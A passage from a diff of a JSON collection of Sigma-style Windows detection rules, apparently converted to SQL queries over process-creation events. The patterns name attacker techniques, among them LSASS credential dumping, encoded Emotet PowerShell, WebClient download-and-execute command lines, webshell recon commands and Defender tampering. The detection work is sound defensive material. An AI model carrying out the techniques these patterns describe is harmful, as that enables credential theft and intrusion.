LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Recon Information for Export with Command Prompt", - "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", + "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", "status": "experimental", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1119" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tree.com' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\doskey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_recon.yml" + "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" }, { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "Audio Capture via PowerShell", + "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "status": "test", + "description": "Detects audio capture via PowerShell Cmdlet.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\' OR CommandLine LIKE '%Toggle-AudioDevice%' ESCAPE '\\' OR CommandLine LIKE '%Get-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Set-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Write-AudioDevice %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_powershell_audio_capture.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", - "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "XSL Script Processing", - "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", - "status": "test", - "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", + "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "status": "experimental", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.defense_evasion" ], "falsepositives": [ - "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", - "Msxsl.exe is not installed by default, so unlikely.", - "Static format arguments - https://petri.com/command-line-wmi-part-3" + "Legitimate usage of the features listed in the rule." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%/format%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/Format:List%' ESCAPE '\\' OR CommandLine LIKE '%/Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%/Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%/Format:table%' ESCAPE '\\' OR CommandLine LIKE '%/Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%/Format:value%' ESCAPE '\\' OR CommandLine LIKE '%/Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:csv%' ESCAPE '\\'))) OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_xsl_script_processing.yml" + "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Wlrmdr Lolbin Use as Launcher", - "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", - "status": "experimental", - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "author": "frack113, manasmbellani", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "status": "test", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((NewProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentProcessName = '-')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_wlrmdr.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", + "title": "Potential Arbitrary File Download Via MSEdge.EXE", + "id": "94771a71-ba41-4b6e-a757-b531372eaab6", "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR OriginalFileName = 'msedge.exe') AND (CommandLine LIKE '%.exe http%' ESCAPE '\\' OR CommandLine LIKE '%msedge http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_browsers_msedge_arbitrary_download.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", - "id": "536e2947-3729-478c-9903-745aaffe60d2", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invocation_specific.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "HackTool - Jlaive In-Memory Assembly Execution", - "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "title": "Registry Modification Via Regini.EXE", + "id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", "status": "experimental", - "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate modification of keys" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND 